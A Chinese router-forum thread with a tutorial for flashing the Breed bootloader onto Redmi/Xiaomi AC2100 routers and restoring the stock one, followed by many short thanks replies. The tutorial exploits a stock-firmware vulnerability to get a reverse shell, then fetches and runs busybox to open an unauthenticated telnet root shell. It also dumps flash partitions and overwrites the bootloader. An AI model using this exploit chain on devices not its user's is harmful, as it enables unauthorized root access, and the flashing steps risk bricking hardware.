恩山无线论坛

标题: 红米/小米AC2100刷入r3g breed以及恢复官方boot详细教程(更新查坏块方法、pb-boot) [打印本页]

作者: ivybridgexeon    时间: 2020-5-8 21:45
标题: 红米/小米AC2100刷入r3g breed以及恢复官方boot详细教程(更新查坏块方法、pb-boot)
本帖最后由 ivybridgexeon 于 2020-6-30 22:44 编辑

1、首先说明,如果你现在用的是openwrt固件boot分区可能有锁建议更新最新源码编译的openwrt(新源码编译的openwrt已解除boot分区锁)。
2、如果还没刷机(用的官方固件),可以在本帖步骤“二、刷入r3gbreed”开头查坏块。如果你已经刷过机,查坏块方法详见本帖“三、刷入breed后续"。
3、lintel的专用pb-boot已出,刷入方法在“pb-boot-rm2100-Readme.txt”中。lintel的pb-boot链接http://downloads.pangubox.com:6380/lintel/Redmi_AC2100/

一、通过漏洞打开路由telnet
1:在开始菜单-设置-程序-程序和功能-启用和关闭Windows功能  勾选telnet client(或telnet 客户端)

2:从“控制面板\网络和 Internet\网络连接”把你的所有不相关的网络接口都禁掉包括虚拟机接口修改连接路由器的网口地址为192.168.31.177,子网掩码255.255.255.0,默认网关192.168.31.1。

3:关闭所有杀毒软件关闭防火墙,解压好刷机工具中的breed教程完整版.zip
打开/rm2100文件夹,先安装文件夹里的WinPcap_4_1_3.exe或者npcap-0.9991.exe
之后打开 开启telnet命令.txt一键开启telnet.bat(不用管理员运行)
提前复制好开启telnet命令.txt里面的内容


4:进入路由器,确保路由地址为192.168.31.1,修改好pppoe的账号密码。
账号:123
密码:123
把你的路由器按照如下连接
[attach]383604[/attach]

5:执行一键开启telnet.bat,按提示操作,直到反弹shell窗口显示收到数据。

6:把前面复制的
  1. cd /tmp&&wget http://192.168.31.177:8081/busybox&&chmod a+x ./busybox&&./busybox telnetd -l /bin/sh
复制代码

粘贴到反弹shell窗口(右键为粘贴),回车运行
至此,路由器telnet功能成功开启

卡反弹shell等问题大概率是电脑系统、防火墙、杀毒软件造成的,如果开telnet你这一步没有成功,就彻底关掉电脑防火墙和杀毒软件(系统建议用win10正版最新),
然后删掉之前文件,关闭所有进程重新解压breed教程完整版.zip再从头走一遍。


注意:路由telnet开启成功后记得把WAN-LAN之间的网线(上面接线图棕色线)拔掉,否则刷入breed后易造成网络风暴。


二、刷入r3gbreed

【从原厂固件】

Win+R ,输入cmd回车打开命令行(也可以用puttyxshell),
  1. telnet 192.168.31.1
复制代码
  1. cd /tmp
复制代码
查看坏块的命令是(分析见下文)
  1. dmesg | grep NAND
复制代码
  1. dmesg | grep '[B|b]ad.*block'
复制代码
  1. dmesg | grep eraseblock
复制代码

查看路由当前分区的命令是
  1. cat /proc/mtd
复制代码
[attach]383624[/attach]

想要备份路由原厂分区的,可以先在电脑以管理员权限运行/rm2100中的 ftpdmin.exe之后回到telnet命令行

例如:想备份mtd1分区,就在命令行输入
  1. ./busybox nanddump -f mtd1.bak /dev/mtd1
复制代码
  1. ./busybox ftpput 192.168.31.177 mtd1.bak ./mtd1.bak
复制代码


备存文件存在你rm2100文件所在的硬盘根目录。不想备份也可以,我给的文件中有mtd1和eeprom的备份。



注意此时“Task_文件服务器”进程是否还在运行,没运行的再执行一下/rm2100中的httpserver.bat)备份之后,执行
  1. wget http://192.168.31.177:8081/breed-mt7621-xiaomi-r3g.bin&&nvram set uart_en=1&&nvram set bootdelay=5&&nvram set flag_try_sys1_failed=1&&nvram commit
复制代码
  1. mtd -r write breed-mt7621-xiaomi-r3g.bin Bootloader
复制代码

将电脑改为自动获取ip,等待路由器重启(当电脑获取到ip或者路由只有一个蓝灯亮时,breed引导官方固件成功)。

建议等待5分钟后拔电,用牙签按住reset键再插电,等蓝灯闪烁,松开reset键,浏览器访问192.168.1.1即可进入breedweb界面。
首次进入breed记得先备份下编程器固件和eeprom。

至此,路由器成功刷入breed。

【从padavan】

[attach]384944[/attach]
winscpbreed-mt7621-xiaomi-r3g.bin 传入padavan的/tmp文件夹,
(winscp 就是路由器的可视化文件管理器,跟ftp的用法一样,填好路由ip地址,账号密码就登进去了,然后打开/tmp,把breed文件从电脑拖进去)

xshell、puttytelnet命令行登录padavan,执行
  1. cd /tmp
复制代码

备份:
  1. cat /proc/mtd
复制代码
[attach]383744[/attach]
  1. cat /dev/mtdblock0 > /tmp/mtd0.bak
复制代码
winscp/tmp/mtd0.bak文件传回电脑。


刷写breed:
  1. mtd_write -r write breed-mt7621-xiaomi-r3g.bin Bootloader
复制代码

将电脑改为自动获取ip,等待路由器重启(当电脑获取到ip或者路由只有一个蓝灯亮时,breed引导padavan固件成功)。

建议等待5分钟后拔电,用牙签按住reset键再插电,等蓝灯闪烁,松开reset键,浏览器访问192.168.1.1即可进入breedweb界面。
首次进入breed记得先备份下编程器固件和eeprom。

至此,路由器成功刷入breed。

三、刷入breed后续

如果你刷完后进了小米官方的系统或者进不了系统,可以尝试进入breed后增加环境变量 xiaomi.r3g.bootfw,值为2 。 参考 https://www.right.com.cn/forum/thread-4023403-1-2.html

对breed操作不太明白的可以看hackpascal大佬的原贴 https://www.right.com.cn/forum/forum.php?mod=viewthread&tid=161906

推荐一下chongshengB大佬的padavan固件 https://github.com/chongshengB/rt-n56u/releases
刷入openwrt有问题的可以参考 https://www.right.com.cn/forum/thread-4025861-1-1.html
集客0512版本可从breed直接刷入,参考 https://www.right.com.cn/forum/thread-4021056-1-1.html

0511最新消息,部分红米路由从breed刷入padavan会卡33%校验失败,经过我的研究,有这种情况的路由闪存不太寻常。     



确认闪存坏块分为两步
第一步,翻路由的系统日志或内核日志,一般坏块信息在路由刚启动时的日志附近。如老毛子:
[attach]384862[/attach]

第二步,telnet(或使用xshellputty)登录进路由,依次执行
  1. dmesg | grep NAND
复制代码
  1. dmesg | grep '[B|b]ad.*block'
复制代码
  1. dmesg | grep eraseblock
复制代码

会有四种情况:  


1、执行指令没有返回任何信息,翻日志也没找到任何闪存相关信息,重启下路由再找一次。

2、执行返回信息中有ESMT字样,翻日志也没有显示坏块信息的是ESMT闪存,没有检测到坏块。


3、较为正常东芝闪存返回信息:坏块768。但刷固件一切正常。目前我刷过几十次固件,坏块暂时还没有增加。
[attach]384613[/attach]

4、是东芝闪存而且有问题的路由返回信息如图,坏块90+768,根据调查“90”这个数字还有其他值,推测跟东芝闪存体质有关。
东芝和ESMT用的都是SLC闪存(寿命最长的闪存),而且不少机器只开telnet,不刷固件或breed也出现坏块,所以坏块应该不是刷机造成的,是东芝闪存生产出来自带的(质量参差不齐)。[attach]384611[/attach]
目前有两种推测:
(1)坏块位置比较靠后,官方固件只用到了前面一部分如kernel0,所以官方固件不影响使用。
(2)官方和op固件屏蔽闪存坏块的机制较为完善(类似u盘量产的时候屏蔽坏块),所以官方和部分op固件可以正常使用。
padavan固件会用到有的坏块区域,如kernel1,所以有的机器不能刷入padavan,或者刷入后使用有问题。




原厂bootloader关于badblock、ECC、NAND的相关描述,自行参考
[attach]385085[/attach]
[attach]385084[/attach]









[attach]383623[/attach]

目前已知红米路由闪存有东芝和ESMT两种,breed均正常启动。
[attach]383735[/attach]   [attach]383728[/attach]



四、刷回官方bootloader方法

我写这个教程的原因之一就是恢复官方boot的操作经验证可行,如果你不想用第三方固件,要刷回官方固件,稳妥的操作顺序是先恢复官方boot引导文件,再用官方救砖工具一键刷回。

刷回方法

1、从breed  

根据最新测试,从breed界面“固件更新”-“Bootloader”选择官方bootloader文件直接上传并刷写可行。


官方bootloader文件位置:
打开/rm2100
红米用bootloader-redmi-ac2100.bin
小米用bootloader-xiaomi-ac2100.bin


路由重启后用官方救砖工具可刷回原厂。具体步骤和资源请参考:
小米路由官方救砖工具使用说明 https://www.xiaomi.cn/post/5289432
小米路由官方资源下载首页 http://miwifi.com/miwifi_download.html



2、从padavan固件:

[attach]384944[/attach]
【红米】将/rm2100文件夹中的bootloader-redmi-ac2100.bin通过winscp上传到路由/tmp目录下,
xshell、puttytelnet命令行进老毛子,执行
  1. mtd_write -r write /tmp/bootloader-redmi-ac2100.bin Bootloader
复制代码


【小米】将bootloader-xiaomi-ac2100.bin通过winscp上传到路由/tmp目录,
执行
  1. mtd_write -r write /tmp/bootloader-xiaomi-ac2100.bin Bootloader
复制代码



路由重启后用官方救砖工具可刷回原厂。具体步骤和资源请参考:
小米路由官方救砖工具使用说明 https://www.xiaomi.cn/post/5289432
小米路由官方资源下载首页 http://miwifi.com/miwifi_download.html


3、从openwrt固件:
[attach]384964[/attach]
由于部分op的boot分区有锁,建议最好还是先从breed刷入老毛子再按上文恢复官方
如果想试试,就按上文老毛子的方法导入bootloader文件,执行
【红米】
  1. mtd -r write /tmp/bootloader-redmi-ac2100.bin Bootloader
复制代码


【小米】
  1. mtd -r write /tmp/bootloader-xiaomi-ac2100.bin Bootloader
复制代码



五、小米/红米AC2100专用pb-boot
lintel的专用pb-boot已出,刷入方法在“pb-boot-rm2100-Readme.txt”中。lintel的pb-boot链接http://downloads.pangubox.com:6380/lintel/Redmi_AC2100/




最后提醒:刷机须谨慎,后果自负




hackpascal大佬的原贴https://www.right.com.cn/forum/forum.php?mod=viewthread&tid=161906
r3gbreed下载链接 https://breed.hackpascal.net/breed-mt7621-xiaomi-r3g.bin

官方原厂bootloader备份 https://www.right.com.cn/forum/thread-4023403-1-2.html
感谢https://www.right.com.cn/forum/thread-4016985-1-1.html提供的win平台一键脚本
引用下教程https://www.right.com.cn/forum/thread-4017726-1-1.html
刷入r3gbreed的创意来自https://4pda.ru/forum/index.php?showtopic=975687&st=1580#entry96288010
刷入方法由一位越南朋友带来论坛https://www.right.com.cn/forum/thread-4022855-1-4.html



小米官方救砖工具使用说明 https://www.xiaomi.cn/post/5289432
小米官方资源下载首页 http://miwifi.com/miwifi_download.html

小米官方救砖工具下载 http://bigota.miwifi.com/xiaoqiang/tools/MIWIFIRepairTool.x86.zip
红米原厂固件下载 http://cdn.cnbj1.fds.api.mi-img. ... re_d517e_1.0.14.bin
小米原厂固件下载 http://bigota.miwifi.com/xiaoqia ... e_64288_2.0.376.bin


推荐一下xshell下载地址,对个人免费 https://www.netsarang.com/zh/free-for-home-school 。  

winscp下载 https://winscp.net/download/WinSCP-5.17.5-Setup.exe
putty下载 https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe





【完整版】蓝奏云:https://lanzous.com/icgyl1e    GDhttps://drive.google.com/file/d/ ... sF/view?usp=sharing
【单独文件】https://lanzous.com/icgyjub
【官方下载的xshell、winscp、putty】 https://lanzous.com/icgsv3a     
【有消息说小米会修复漏洞,备份下当前原厂固件】 https://lanzous.com/icgst5a














作者: accors    时间: 2020-5-8 21:48
前排帮顶,有了breed绝对会可玩性大增
作者: q2844332    时间: 2020-5-8 21:49
火钳刘明,啦啦啦啦
作者: wzllpl    时间: 2020-5-8 21:51
顶顶楼主 分享经验
作者: 心野路子正    时间: 2020-5-8 21:52
感谢分享 学习一下
作者: 帅哥帅哥63    时间: 2020-5-8 21:52
顶顶顶,火钳刘明
作者: bb1993916    时间: 2020-5-8 21:52
不错不错!!!!!!!!
作者: goodhang    时间: 2020-5-8 21:53
感恩,谢谢楼主分享
作者: qq372913511    时间: 2020-5-8 21:53
666666这么快就有breed了

作者: luchangying    时间: 2020-5-8 21:54
感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
作者: siemeis    时间: 2020-5-8 21:54
这下牛逼了,【老毛子Padavan固件  可以打开打开路由telnet,是不是可以直接在Padavan固件基础上自己刷入breed
作者: jasontu    时间: 2020-5-8 21:54
新方法试试。
作者: ngwk1984    时间: 2020-5-8 21:54
有了breed绝对会可玩性大增
作者: yangboaaa    时间: 2020-5-8 21:55
已刷老毛子的必须救砖后才能刷?
作者: xxrouter    时间: 2020-5-8 21:56
机器晚到一天,连这都有了
作者: Guaniu    时间: 2020-5-8 21:56
66666666666666666666666666666666666
作者: LEFrost    时间: 2020-5-8 21:56
学习下明天尝试
作者: lhs1413    时间: 2020-5-8 21:56
感谢分享感谢分享
作者: 恩山_大佬    时间: 2020-5-8 21:57
支持大佬!!
作者: letsgo    时间: 2020-5-8 21:58
看看怎么使用,谢谢分享
作者: guipux    时间: 2020-5-8 21:59
厉害了我的哥,这么快就出不死了。
作者: fireplume    时间: 2020-5-8 22:00
刷机攻略越来越成熟了。
作者: 初心    时间: 2020-5-8 22:00
感谢分享!!!!!
作者: 航校门口二楼修    时间: 2020-5-8 22:01
本帖最后由 航校门口二楼修 于 2020-5-9 06:40 编辑

楼主真牛,楼主威武
作者: 83304911@qq.com    时间: 2020-5-8 22:02
感谢分享啊
作者: raistling    时间: 2020-5-8 22:03
谢谢分享,2100的刷机方法越来越强大了
作者: wosixuqian14    时间: 2020-5-8 22:04
有BREED救完美了。
作者: 33415790    时间: 2020-5-8 22:04
支持 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!
作者: Tuan565    时间: 2020-5-8 22:05
工作正常
作者: 西湖码农    时间: 2020-5-8 22:07
感谢大佬分享
作者: chadedaxia    时间: 2020-5-8 22:07
。。。。。。。哈哈哈哈哈哈哈哈哈

作者: Skrillex    时间: 2020-5-8 22:07
谢谢分享哈哈哈哈、
作者: stanle1    时间: 2020-5-8 22:09
感谢大佬~~~~~~
作者: devper    时间: 2020-5-8 22:09
顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶
作者: hywlzx    时间: 2020-5-8 22:10
机器刚到 、新手试试
作者: 598850508    时间: 2020-5-8 22:11
好东西,刷起来更加方便了


作者: moqijun1219    时间: 2020-5-8 22:12

好东西,刷起来更加方便了
作者: lnzhb123    时间: 2020-5-8 22:12
谢谢谢谢下
作者: zhlichem838    时间: 2020-5-8 22:13
感谢分享 学习一下
作者: wslhlzlz    时间: 2020-5-8 22:15
感谢分享谢谢
作者: windfox2020    时间: 2020-5-8 22:16
回复看隐藏
作者: ivybridgexeon    时间: 2020-5-8 22:16
航校门口二楼修 发表于 2020-5-8 22:01
这个是红米ac2100的图
你改一下

你这个是老毛子的mtd分区,我帖子里写的是原厂固件分区,不太一样
作者: xu2242000    时间: 2020-5-8 22:18
感谢分享感谢分享
作者: sicidy    时间: 2020-5-8 22:18
想看看,收藏。。

作者: coder_ning    时间: 2020-5-8 22:22
越来越成熟了
作者: vanmercury    时间: 2020-5-8 22:25
今天机器刚到,等周日试试
作者: Xin88    时间: 2020-5-8 22:27
我来学习学习
作者: 先疯队队长    时间: 2020-5-8 22:28
感谢楼主分享
作者: 暮雨洒江天    时间: 2020-5-8 22:29
昨天晚上还在说,今天教程就出了  666
作者: kEv1n    时间: 2020-5-8 22:30
后面应该会有对应的breed
作者: misnow    时间: 2020-5-8 22:30
感谢分享,很有用
作者: zhumao    时间: 2020-5-8 22:31
总算找到你了
作者: amorist    时间: 2020-5-8 22:31
楼主真牛逼 一直等这个
作者: chgshushi    时间: 2020-5-8 22:33
刷机真的越来越简单了,感谢大神们付出
作者: voldemort    时间: 2020-5-8 22:35
多谢楼主分享
作者: qinyu0471    时间: 2020-5-8 22:37
现在立刻试一下

作者: yhgain    时间: 2020-5-8 22:37
感谢大佬,鼓掌

作者: yuyangyu755    时间: 2020-5-8 22:38
感谢分享!!!!
作者: 章弎封    时间: 2020-5-8 22:48
看看怎么样

作者: ghj74125836    时间: 2020-5-8 22:51
谢谢分享,刷下试试看
作者: 航校门口二楼修    时间: 2020-5-8 22:52
哦,我还以为我的图是小米官方固件的图呢。那mtd0就一定要备份了。这个可是编程器固件。

作者: miniyellow    时间: 2020-5-8 22:55
好几个帖子来回看终于弄懂了点
作者: 23212107    时间: 2020-5-8 22:57
感谢你的分享,无论怎样,你都是最无私的人!来,说说,你 E 盘上还有啥一起给我吧!
作者: wzwys9    时间: 2020-5-8 23:18
冲啊,先刷刷再说吧,问题不大
作者: Peja    时间: 2020-5-8 23:19
楼主厉害!~~
作者: 18669855855    时间: 2020-5-8 23:20
顶顶楼主 分享经验


作者: 明日边缘    时间: 2020-5-8 23:20
我的恩山、我的无线 The best wifi forum is right here.

作者: 周口球球    时间: 2020-5-8 23:22
小米AC2100刷入r3g
作者: a1253870548    时间: 2020-5-8 23:22
大佬秀呀!!!!!!!
作者: 352033412    时间: 2020-5-8 23:22
看看稳不稳
作者: twjacy    时间: 2020-5-8 23:23
感谢分享!!!!!!!!!!!!!
作者: zs19820329    时间: 2020-5-8 23:23
不错终于有breed了刷机就简单了
作者: kkbbkiller    时间: 2020-5-8 23:25
牛逼,收来用用
作者: jaywc111    时间: 2020-5-8 23:25
刷机需谨慎

作者: wzq123    时间: 2020-5-8 23:26
5555 顶顶楼主 分享经验
作者: ss96034    时间: 2020-5-8 23:36
666666666666666
作者: iwo    时间: 2020-5-8 23:36
本帖最后由 iwo 于 2020-5-8 23:42 编辑

小白请问官方新机原厂固件,怎么自己备份官方bootloader/固件?
备份后不想用其他固件了,可以完全还原原厂固件吗?
作者: llmwxt    时间: 2020-5-8 23:38
谢谢分享,非常需要!
作者: aa283805868    时间: 2020-5-8 23:39
卧槽厉害啊 真的假的
作者: A六度亿通数码    时间: 2020-5-8 23:41
能刷回官方uboot吗

作者: coolterry    时间: 2020-5-8 23:41
dddddddddddddddddddddddddddd
作者: jimeistone    时间: 2020-5-8 23:45
有了breed绝对会可玩性大增
作者: qinyu0471    时间: 2020-5-8 23:46
第5步一键开启telnetl显示如下信息:
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
这个要如何处理,windwos系统没有开什么服务?所以http的IP地址没有改变为192.168.31.177?
作者: hoepless888    时间: 2020-5-8 23:47
看下工具,有bread方便多了
作者: pnq    时间: 2020-5-8 23:48
真快,教程说发就发了
作者: simplekou    时间: 2020-5-8 23:50
学习了。。
作者: A六度亿通数码    时间: 2020-5-8 23:50
怎么备份编辑器固件,没有usb口

作者: A六度亿通数码    时间: 2020-5-8 23:51
而且,刷了3G的breed怎么刷回官方uboot....

作者: 清晨点支烟    时间: 2020-5-8 23:56
好像很牛掰的样子
作者: pizishe    时间: 2020-5-8 23:57
小米AC2100刷入r3g breed详细教程
作者: sdz1993    时间: 2020-5-9 00:04
感谢教程

作者: 紫晶怪兽    时间: 2020-5-9 00:09
qinyu0471 发表于 2020-5-8 23:46
第5步一键开启telnetl显示如下信息:
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
这 ...

关防火墙,禁用其他网卡
作者: 紫晶怪兽    时间: 2020-5-9 00:09
A六度亿通数码 发表于 2020-5-8 23:51
而且,刷了3G的breed怎么刷回官方uboot....

breed里刷bootload
作者: wolaizizhihu    时间: 2020-5-9 00:12
牛逼啊  大佬   膜拜
作者: 376334781    时间: 2020-5-9 00:13
支持一下,哈哈
作者: kobe224    时间: 2020-5-9 00:17
KANKANZENMESHUO
作者: 紫晶怪兽    时间: 2020-5-9 00:17
刷OP的可以参考 https://www.right.com.cn/forum/thread-3751689-1-1.html 这个帖子的第四步 ,如果有直刷factory固件成功的也可分享下经验
作者: hfy166    时间: 2020-5-9 00:18
这样就方便多了
作者: 花生米    时间: 2020-5-9 00:20
感谢大佬的分享,回去试试
作者: 伏特    时间: 2020-5-9 00:25
看看里面的内容!




欢迎光临 恩山无线论坛 (https://www.right.com.cn/forum/) Powered by Discuz! X3.5